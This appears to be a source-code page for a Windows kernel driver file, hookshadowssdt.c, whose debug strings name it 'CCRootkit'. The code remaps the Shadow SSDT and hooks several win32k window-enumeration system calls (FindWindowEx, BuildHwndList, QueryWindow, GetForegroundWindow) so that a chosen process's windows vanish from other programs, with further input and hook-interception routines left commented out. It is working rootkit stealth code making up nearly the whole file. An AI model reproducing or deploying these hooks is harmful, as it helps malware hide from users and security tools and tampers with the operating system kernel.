📄 hookshadowssdt.c
字号:
{
NTSTATUS ntStatus;
PEPROCESS crsEProc;
PKAPC_STATE ApcState;
//获得shadow的地址
GetShadowTable();
//根据不同的系统获得不同的函数服务号
InitSysCallIndex();
ntStatus = PsLookupProcessByProcessId((HANDLE)GetCsrPid(), &crsEProc);
if (!NT_SUCCESS( ntStatus ))
{
dprintf("CCRootkit: PsLookupProcessByProcessId() error\n");
return ntStatus;
}
ApcState = (PKAPC_STATE)ExAllocatePool(NonPagedPool, sizeof(KAPC_STATE));
KeStackAttachProcess(crsEProc, ApcState);
//KeAttachProcess(crsEProc);
g_pMdlSystemCall = IoAllocateMdl(
KeServiceDescriptorTableShadow[1].ServiceTableBase,
KeServiceDescriptorTableShadow[1].NumberOfServices*4,
FALSE, //not associated with an IRP
FALSE, //charge quota, should be FALSE
NULL); //IRP * should be NULL
if(!g_pMdlSystemCall)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(g_pMdlSystemCall);
g_pMdlSystemCall->MdlFlags = g_pMdlSystemCall->MdlFlags|MDL_MAPPED_TO_SYSTEM_VA;
MappedSystemCallTable = MmMapLockedPages(g_pMdlSystemCall, KernelMode);
__try
{
if( ( KeServiceDescriptorTableShadow != NULL )
&& ( NtUserFindWindowExIndex != 0 )
&& ( NtUserGetForegroundWindowIndex != 0 )
&& ( NtUserBuildHwndListIndex != 0 )
&& ( NtUserQueryWindowIndex != 0 )
/*
&& ( NtUserWindowFromPointIndex != 0 )
&& ( NtUserSetWindowsHookExIndex != 0 )
&& ( NtUserGetDCIndex != 0 )
&& ( NtUserGetDCExIndex != 0 )
&& ( NtUserSendInputIndex !=0 )
*/
)
{
//hook shadow system calls and save old system call locations
HOOK_SHADOW_SYSCALL( NtUserFindWindowExIndex, HookOfNtUserFindWindowEx, OrigNtUserFindWindowEx );
HOOK_SHADOW_SYSCALL( NtUserQueryWindowIndex, HookOfNtUserQueryWindow, OrigNtUserQueryWindow );
HOOK_SHADOW_SYSCALL( NtUserBuildHwndListIndex, HookOfNtUserBuildHwndList, OrigNtUserBuildHwndList );
HOOK_SHADOW_SYSCALL( NtUserGetForegroundWindowIndex, HookOfNtUserGetForegroundWindow, OrigNtUserGetForegroundWindow );
//HOOK_SHADOW_SYSCALL( NtUserWindowFromPointIndex, HookOfNtUserWindowFromPoint, OrigNtUserWindowFromPoint );
//HOOK NtUserSetWindowsHookEx用来防范安装全局钩子
//HOOK_SHADOW_SYSCALL( NtUserSetWindowsHookExIndex, HookOfNtUserSetWindowsHookEx, OrigNtUserSetWindowsHookEx );
//HOOK_SHADOW_SYSCALL( NtUserGetDCIndex, HookOfNtUserGetDC, OrigNtUserGetDC );
//HOOK_SHADOW_SYSCALL( NtUserGetDCExIndex, HookOfNtUserGetDCEx, OrigNtUserGetDCEx );
//挂钩NtUserSendInput来拦截键盘鼠标等模拟输入
//HOOK_SHADOW_SYSCALL( NtUserSendInputIndex, HookOfNtUserSendInput, OrigNtUserSendInput );
dprintf("DDDDDDDD %X, %X\n", HookOfNtUserFindWindowEx, OrigNtUserFindWindowEx);
}
else
{
KeServiceDescriptorTableShadow = NULL;
}
}
__finally
{
KeUnstackDetachProcess(ApcState);
//KeDetachProcess();
}
return ntStatus ;
}
//停止Shadow Hook
NTSTATUS UnHookShadowTable()
{
NTSTATUS ntStatus;
PEPROCESS crsEProc;
PKAPC_STATE ApcState;
ntStatus = PsLookupProcessByProcessId((HANDLE)GetCsrPid(), &crsEProc);
if (!NT_SUCCESS( ntStatus ))
{
dprintf("CCRootkit: PsLookupProcessByProcessId() error\n");
return STATUS_UNSUCCESSFUL;
}
ApcState = (PKAPC_STATE)ExAllocatePool(NonPagedPool, sizeof(KAPC_STATE));
KeStackAttachProcess(crsEProc, ApcState);
//KeAttachProcess(crsEProc);
__try
{
if( ( KeServiceDescriptorTableShadow != NULL)
&& ( NtUserFindWindowExIndex != 0)
&& ( NtUserGetForegroundWindowIndex != 0)
&& ( NtUserBuildHwndListIndex != 0)
&& ( NtUserQueryWindowIndex != 0)
/*
&& ( NtUserWindowFromPointIndex!=0 )
&& ( NtUserSetWindowsHookExIndex != 0)
&& ( NtUserGetDCIndex != 0 )
&& ( NtUserGetDCExIndex != 0 )
&& ( NtUserSendInputIndex !=0 )
*/
)
{
UNHOOK_SHADOW_SYSCALL( NtUserFindWindowExIndex, HookOfNtUserFindWindowEx, OrigNtUserFindWindowEx );
UNHOOK_SHADOW_SYSCALL( NtUserQueryWindowIndex, HookOfNtUserQueryWindow, OrigNtUserQueryWindow );
UNHOOK_SHADOW_SYSCALL( NtUserBuildHwndListIndex, HookOfNtUserBuildHwndList, OrigNtUserBuildHwndList );
UNHOOK_SHADOW_SYSCALL( NtUserGetForegroundWindowIndex, HookOfNtUserGetForegroundWindow, OrigNtUserGetForegroundWindow );
//UNHOOK_SHADOW_SYSCALL( NtUserWindowFromPointIndex, HookOfNtUserWindowFromPoint, OrigNtUserWindowFromPoint );
//UNHOOK_SHADOW_SYSCALL( NtUserSetWindowsHookExIndex, HookOfNtUserSetWindowsHookEx, OrigNtUserSetWindowsHookEx );
//UNHOOK_SHADOW_SYSCALL( NtUserGetDCIndex, HookOfNtUserGetDC, OrigNtUserGetDC );
//UNHOOK_SHADOW_SYSCALL( NtUserGetDCExIndex, HookOfNtUserGetDCEx, OrigNtUserGetDCEx );
//UNHOOK_SHADOW_SYSCALL( NtUserSendInputIndex, HookOfNtUserSendInput, OrigNtUserSendInput );
}
}
__finally
{
//KeDetachProcess();
KeUnstackDetachProcess(ApcState);
Sleep(50);
}
if(MappedSystemCallTable)
{
MmUnmapLockedPages(MappedSystemCallTable, g_pMdlSystemCall);
IoFreeMdl(g_pMdlSystemCall);
}
return STATUS_SUCCESS;
}
//Hook NtUserFindWindowEx,NtUserBuildHwndList,NtUserQueryWindow,NtUserGetForegroundWindow,
//NtUserWindowFromPoint来防止其他应用程序通过FindWindow,FindWindowEx,EnumWindow,
//EnumWindowEx,WindowFromPoint,GetForegroundWindow 这些函数来枚举我们的窗口。
//HOOK 函数的实现
NTSTATUS HookOfNtUserFindWindowEx(
IN HWND hwndParent,
IN HWND hwndChild,
IN PUNICODE_STRING pstrClassName OPTIONAL,
IN PUNICODE_STRING pstrWindowName OPTIONAL,
IN DWORD dwType)
{
NTSTATUS ntStatus;
ntStatus = OrigNtUserFindWindowEx(hwndParent, hwndChild, pstrClassName, pstrWindowName, dwType);
if (PsGetCurrentProcessId() != (HANDLE)ProcessIdToProtect)
{
ULONG ProcessID;
ProcessID = OrigNtUserQueryWindow(ntStatus, 0);
dprintf("ProcessID:%d", ProcessID);
if (ProcessID == (ULONG)ProcessIdToProtect)
{
return 0;
}
}
else
{
dprintf("EEEEEEEEE NtUserFindWindowEx is called\n");
}
dprintf("NtUserFindWindowEx is called\n");
return ntStatus;
}
NTSTATUS HookOfNtUserBuildHwndList(
IN HDESK hdesk,
IN HWND hwndNext,
IN ULONG fEnumChildren,
IN DWORD idThread,
IN UINT cHwndMax,
OUT HWND *phwndFirst,
OUT ULONG* pcHwndNeeded)
{
NTSTATUS ntStatus;
if (PsGetCurrentProcessId() != (HANDLE)ProcessIdToProtect)
{
ULONG ProcessID;
if (fEnumChildren==1)
{
ProcessID = OrigNtUserQueryWindow((ULONG)hwndNext, 0);
if (ProcessID == (ULONG)ProcessIdToProtect)
return STATUS_UNSUCCESSFUL;
}
ntStatus = OrigNtUserBuildHwndList(hdesk, hwndNext, fEnumChildren, idThread, cHwndMax, phwndFirst, pcHwndNeeded);
if (ntStatus == STATUS_SUCCESS)
{
ULONG i=0;
ULONG j;
while (i<*pcHwndNeeded)
{
ProcessID = OrigNtUserQueryWindow((ULONG)phwndFirst[i],0);
if (ProcessID==(ULONG)ProcessIdToProtect)
{
for (j=i; j<(*pcHwndNeeded)-1; j++)
phwndFirst[j]=phwndFirst[j+1];
phwndFirst[*pcHwndNeeded-1] = 0;
(*pcHwndNeeded)--;
continue;
}
i++;
}
}
return ntStatus;
}
else
{
dprintf("EEEEEEEEE NtUserBuildHwndList is called\n");
}
dprintf("NtUserBuildHwndList is called\n");
return OrigNtUserBuildHwndList(hdesk, hwndNext, fEnumChildren, idThread, cHwndMax, phwndFirst, pcHwndNeeded);
}
ULONG HookOfNtUserGetForegroundWindow(VOID)
{
NTSTATUS ntStatus;
ntStatus = OrigNtUserGetForegroundWindow();
if (PsGetCurrentProcessId() != (HANDLE)ProcessIdToProtect)
{
ULONG ProcessID;
ProcessID = OrigNtUserQueryWindow(ntStatus, 0);
if (ProcessID == (ULONG)ProcessIdToProtect)
ntStatus = LastForegroundWindow;
else
LastForegroundWindow = ntStatus;
}
else
{
dprintf("EEEEEEEEE NtUserGetForegroundWindow is called\n");
}
dprintf("NtUserGetForegroundWindow is called\n");
return ntStatus;
}
UINT_PTR HookOfNtUserQueryWindow(
IN ULONG WindowHandle,
IN ULONG TypeInformation)
{
ULONG WindowHandleProcessID;
if( PsGetCurrentProcessId() != (HANDLE)ProcessIdToProtect )
{
WindowHandleProcessID = OrigNtUserQueryWindow(WindowHandle, 0);
if (WindowHandleProcessID == (ULONG)ProcessIdToProtect)
return 0;
}
else
{
dprintf("EEEEEEEEE NtUserQueryWindow is called\n");
}
dprintf("NtUserQueryWindow is called\n");
return OrigNtUserQueryWindow(WindowHandle, TypeInformation);
}
/*
HWND HookOfNtUserWindowFromPoint(LONG x, LONG y)
{
dprintf("NtUserWindowFromPoint is called\n");
return 0;
}
HHOOK HookOfNtUserSetWindowsHookEx(
HINSTANCE Mod,
PUNICODE_STRING UnsafeModuleName,
DWORD ThreadId,
int HookId,
PVOID HookProc,
BOOL Ansi )
{
dprintf("NtUserSetWindowsHookEx is called\n");
return OrigNtUserSetWindowsHookEx(Mod, UnsafeModuleName,
ThreadId, HookId, HookProc, Ansi );
}
HDC HookOfNtUserGetDC(HWND hWnd)
{
dprintf("NtUserGetDC is called\n");
return OrigNtUserGetDC(hWnd);
}
HDC HookOfNtUserGetDCEx(HWND hWnd, HRGN hrgnClip, DWORD flags)
{
dprintf("NtUserGetDCEx is called\n");
return OrigNtUserGetDCEx(hWnd, hrgnClip, flags);
}
UINT HookOfNtUserSendInput(
UINT cInputs,
PINPUT pInputs,
int cbSize)
{
dprintf("NtUserSendInput is called\n");
return OrigNtUserSendInput(cInputs, pInputs, cbSize);
}
*/
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -